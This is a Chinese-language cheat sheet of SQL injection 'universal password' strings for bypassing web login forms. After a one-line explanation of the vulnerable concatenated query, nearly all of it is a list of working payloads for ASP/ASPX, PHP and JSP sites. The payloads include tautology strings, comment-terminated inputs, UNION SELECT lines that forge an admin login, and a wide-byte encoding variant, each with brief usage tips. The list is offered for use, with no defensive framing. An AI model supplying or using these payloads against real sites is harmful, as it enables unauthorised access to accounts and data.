漏洞原理:网站把密码放到数据库中,在登陆验证中一般都用以下sql查询语句去查找数据库, sql=select * from user where username=\'username\'
sql="select * from user where username=\'"&username&"\'and pass=\'"& pass&\'" ,
asp aspx万能密码
1: "or "a"="a
2: \')or(\'a\'=\'a
3:or 1=1--
4:\'or 1=1--
5:a\'or\' 1=1--
6: "or 1=1--
7:\'or\'a\'=\'a
8: "or"="a\'=\'a
9:\'or\'\'=\'
10:\'or\'=\'or\'
11: 1 or \'1\'=\'1\'=1
12: 1 or \'1\'=\'1\' or 1=1
13: \'OR 1=1%00
14: "or 1=1%00
15: \'xor
16: 新型万能登陆密码
用户名 \' UNION Select 1,1,1 FROM admin Where \'\'=\' (替换表名admin)
密码 1
Username=-1%cf\' union select 1,1,1 as password,1,1,1 %23
Password=1
17..admin\' or \'a\'=\'a 密码随便
PHP万能密码
\'or\'=\'or\'
\'or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: \' OR \'1\'=\'1
jsp 万能密码
1\'or\'1\'=\'1
admin\' OR 1=1/*
用户名:admin 系统存在这个用户的时候 才用得上
密码:1\'or\'1\'=\'1
admin\' or \'a\'=\'a 与 admin\' or 1=1--用户名应该是存在的,然后是闭合后半个单引号或者用--注释掉。